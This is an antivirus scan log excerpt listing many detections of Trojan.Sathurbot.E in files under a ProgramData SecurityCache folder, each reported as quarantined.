Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6754cfecae61493964516786e862034a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6794318076f8df2ddbbdd4ff7927f10a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\67dedcd9029bac22b3f63083e26a814f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\681d1c56fefdf5064964d65ffe5a6be3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\682b108f4d7b74c1ad51b38ce08dcd5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\691fcacc02bc1047e58a2e80d2739b75, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\696acdc18471bad4e7424cb0996099cc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\69e3c3a6e946adc33bfe8c0e961954a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6a261f1464cdce0b33f8f4ecd1d1ddd4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6a3c00af9c87188194351bfb60e888a9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6a50c4bc3eadcd483eedf1b30935e613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6c5cb2fc9f84db9de134598a02912f6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6cf1a4221dc6831c0b264d2888c75720, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\6d6351fb46b5fe461f13a94f6cb339ea, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\9bba2f1e69982976340996427e7778a0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\9eb5b6e6ae69e3bc13cc76f94dd6fded, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a1950e3528b0871ee6f1e0891096f785, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a544aaf5c59dbfc473ac2e3ad7274d53, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a5825cb12a9a21ab824c133c72022a90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a63c101ceef39a9d9ba8542329670eb6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a6dcba063d23763207581bb52dacb051, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a6e8ba69ae6d2e1eaa905bca8e6d90ff, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\a72f77f761f89e309c894b03d2e7bd4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ad8eefaf5286cbec0bb75eaf1b2ffb47, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\af5a4f550df3e39b45118d0d96b32d4d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\af9461fa3a552f3ca0478dcfc0ac362a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\b5becf525befbe03d39413cf887d1417, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\b6d721cc81888d2fc338219aee682db8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\b993a99472521cbdaeeeb07bfbc5ef99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\be57846cb109cd96783d9a09e8d76664, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7dab3302070f8e886220313eae12694e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7dc7aa964a3778773926ce47d3ed6bc7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7dee4e623d06c82f12da1b32d739e055, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7e8f4bb2dce979fd6160cd928709b045, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7f57ffcf705c68eb438cc6f35c7cc0a6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\7f8f40c8cecb5de0ae30e927174121d3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\80314d336e5581f4825c25bafd0b2f67, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8071b2e0bda3117347f54c0380caa9be, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\82f6e91ee379a279953b0f5cc542f6b0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\830a7e836dc5f626f298ba8f5f4ef5ab, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\83ae0e7e209219becd1e7bb3057b4a11, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\8518a46f9fcad1ca962b282ae0145c40, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\183fb8947af66b4e00cfe938ccb4b40c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\18927ccfded0d0bce2c25484315d2550, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\1bf8ddd876682be4149bc49e2386fa37, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\1ca0d14fa7448c8f80cd2be26548ab3d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\1d3257c5e4c8f8afa1263428ef788e06, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\1e96dc0081d605db4607f655335d70f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\1f11c252718b0dceea8f4e6def7fbe79, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\20cf9543585b13f565de6ba5ba81b1fa, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\de177bcd62fd5092202343daceab8714, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\de957e4f995aaddbf21a460ac6d6bf6d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\df99cab0dad57776f1c2ff98e43905ba, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e099fdbf84410511c0f424d389fc60a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e112b9581d3d5ba2651112319eb4672d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e2d766817600073df74c0cf6b0b61496, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e78ef53bd32609839d2737d2ecc0cf01, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e99153e73fac59432bc922fff075bc0f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\e9f653c8aa546072140276f9706f7792, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\eb44cb5d0f487dc8aab2f8d517ff7536, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c569574822bef5c4d80349b4230032cd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c5e7172ccbca5ee12ccec8dbfbb0a916, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\c7db0c3f907b23bfa8df0829534cc38e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ca5e0d1ed3240ff21f1ae59191855325, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\cc245c8e4392379c24dc19aa1df88b76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\cc6b0cf1d835f721d67b8e62a3e764e5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\cddb6acc16ff9137398363bbe03263de, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\ce09e7ac485e61a20d82d8fa43a506a3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\cfe2d42980cc06cdf0bbfd4e6960915b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2abc6f3e0a5236dc6f62668ff5bc4e33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2af68deceeb5865b945c578b9ee63cc4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2c7c602718049c67e933ffa40e5da42e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\2f1e4664911cc42c367ca2875ddb2ff9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\330e3d5b4ae8d0b769873c425c01c913, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\3367a180a64bb4b31da2d6965f49c613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\345dbb1e10eb304f47c293bbd8b06e5d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\350faf47d3ddd37a10d22bd00961ec33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\389bded36d89adf971ebc258373fa5cf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\46f944387ed36384118d8623f6e1531b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\483c4d526d59228c7d0d68d085fbe81a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\492f2347112f091a4eb2e43788498cad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\4b468578921d69825db9f3c80678664b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\4c7fc889b07f3fae40526a7f39ac34dd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\4cfccf2b7ab56112367e4add655165ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\4d26033c23c5eb763dc97044da803b3f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\52103c6d72a58fcc5177ba768e10d13a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\52a38425d712166eee12e8bf380ea984, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\f9b5675e6579d5e98b41312ae6345199, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fa22a82b1df7b08df25803806bd9694f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\faaee814b82c2a36f06e40af075cb5c1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fc7160b2565bdcc8382fa74e43495799, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fd2c8238c0e8ea5bd3ea58d9470224f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fe75751f0e65f636df55620338ed3cd1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fe9fbb1ce8e35f5400c89d9ce9f5db14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\resume\fefdd2265913197c649c88a119955d59, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\02b08cc11c5281e6d56d75c3e5ec6f6f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\046134dc081d4e4bd60228d94b4a07ad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\06a0c344dcc4ebb5d62009a224e61685, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\06acf43cdbcc688223b6bd2ac8dda023, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0a0c265a8fe0019c50ef44989aad9f4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0a3b52a14ec94499246e603d7c967daf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0be17d8f6bd1655f15541dd32c994fd8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0c562f6570fa8511b5aff91dae1df22f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0eeef81f31c54974191c3180e7c559b8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\0f9a9a82cbd1c7ca7783d2700bdbd06b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\144aaba2a6a3a7024a71ade8f80dec76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\14aafd8e07a9d2946637c94ef37d7480, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\169a3337025eed0ae46ef21ac9f029da, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\75fe5ecb00a0dcdcb2ebb33eeeafdb14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\766ea216db4e132842f5f88dff5f4102, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\76aab28808169629449f7b5b28dd1832, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\77711852ea1271f21e48fd93d6b460ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7845b238fba0d738febc6b8d75a76b19, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\785926353aace0cc149794b21ccc8c18, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\79c0273e316f7a0dc2dd98323942d7f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7bc7a84ed845669c6eed879826be7fbc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7c416188c1a8b9f7a8ff4609a83e02b4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7cde92506819f51e710688643e7873e9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7dab3302070f8e886220313eae12694e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7dc7aa964a3778773926ce47d3ed6bc7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d689be2c56c9bef8cd92cf62e665ba1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d83514de16706316d5a5f1caef8d2b36, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d8f7b2e0e75b2750819e98aeabdb125d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\daafc1ea4f1c3d7d6bcbbad50a4a8ea3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\dd4971dcc1fffa4e94555637edd79abf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ddbecfa53bce79286cf9a44b4d6c6c90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\de177bcd62fd5092202343daceab8714, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\de957e4f995aaddbf21a460ac6d6bf6d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\548509c4cb148f0dc069d61e4191e2d9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\55608f6aefba4db7458a652a79a15c92, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\56b05055acf8caa94b019cad0d058ca3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\573376c678cdf8388e8ca569e6a3f42b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\577a157404a9c2bfa0ed3b91f432239c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\580b8e805f78816a32ad46a2d30c4501, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\5ad8fa78eabe15893d3376c8c500e258, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\5afc95652210998bd40844db7075e204, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a6dcba063d23763207581bb52dacb051, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a6e8ba69ae6d2e1eaa905bca8e6d90ff, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a72f77f761f89e309c894b03d2e7bd4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ad8eefaf5286cbec0bb75eaf1b2ffb47, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\af5a4f550df3e39b45118d0d96b32d4d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\af9461fa3a552f3ca0478dcfc0ac362a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\b5becf525befbe03d39413cf887d1417, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\b6d721cc81888d2fc338219aee682db8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\b993a99472521cbdaeeeb07bfbc5ef99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\be57846cb109cd96783d9a09e8d76664, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a63c101ceef39a9d9ba8542329670eb6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c14debd37305c8b9ee44aaba46212b4f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c569574822bef5c4d80349b4230032cd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d2c89325d0d3f197b28dfd6d7b3c47dd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\df99cab0dad57776f1c2ff98e43905ba, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ece31a64f1410072be86549af78ad112, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\22501a12640e0d2eacdf764df1625909, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\22c18af08e624e272bd4f1ae69f33d99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2393dd19a8c1e641f1a6d74c8d2683f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\24487c94123c38ad51f71f3c5f17e6db, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\24956a069784f3ee4da71dc6b3b6709c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2513dc81a92b9c05964b6fb577b29a92, Quarantined, [2851], [355073],1.0.1064
